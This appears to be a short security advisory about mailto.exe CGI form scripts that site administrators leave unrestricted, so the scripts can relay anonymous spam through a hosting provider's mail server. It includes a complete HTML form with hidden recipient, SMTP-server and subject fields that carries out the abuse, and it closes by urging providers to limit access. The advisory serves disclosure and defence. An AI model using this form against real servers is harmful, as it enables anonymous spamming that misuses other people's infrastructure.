|
|
|
|
| |
| Forget about open relays. There is an extremely simple mailto form application called mailto.exe available on the internet - simply create your HTML form, upload the mailto.exe into your cgi-bin, and fire away. The problem is that many site administrators do not lock-down the mailto.exe, allowing anyone with basic HTML knowledge and some tweaking to use the CGI as a spam relay. |
| |
Credit:
The information has been provided by Anonymous.
|
| |
For example:
<FORM ACTION="HTTP://WWW.EXAMPLE.COM/CGI-BIN/MAILTO.EXE" METHOD="POST">
<INPUT TYPE="hidden" NAME="sendto" VALUE=target@spammed-address>
<INPUT TYPE="hidden" NAME="email" VALUE="src@spammer-address ">
<INPUT TYPE="hidden" NAME="server" VALUE="smtp.example.com">
<INPUT TYPE="hidden" NAME="subject" VALUE="SPAM MONGER">
<INPUT TYPE="hidden" NAME="resulturl" VALUE=http://www.example.com>
Name: <INPUT NAME="uname" SIZE=30>
Position: <INPUT NAME="title" SIZE=30>
Company: <INPUT NAME="company" SIZE=30>
E-Mail: <INPUT NAME="email" SIZE=30>
Comments:<TEXTAREA name="comments" ROWS=10 COLS=50 SIZE="10"></TEXTAREA>
Press <INPUT TYPE="submit" VALUE="Submit">
This can be inputted from any html editor or viewer and emails can be fired away. Because it is located on the provider's site (within their domain), the SMTP servers work, and all IP addresses are theirs. In other words, unlike a relay that can reveal the originating IP address, this provides for none of that.
Trivial searching with our favorite engine reveals two immediate, fully functional provider's instruction including all their details, which work exactly as described. No doubt, deep searching will yield many more.
Notes:
There does not seem to be a single solution, other than to release this and urge all providers, hosting services, other to be aware and remove or certainly not give your working server details or limit access to the mailto.exe CGI.
|
|
|
|
|
|
|
|
|
|
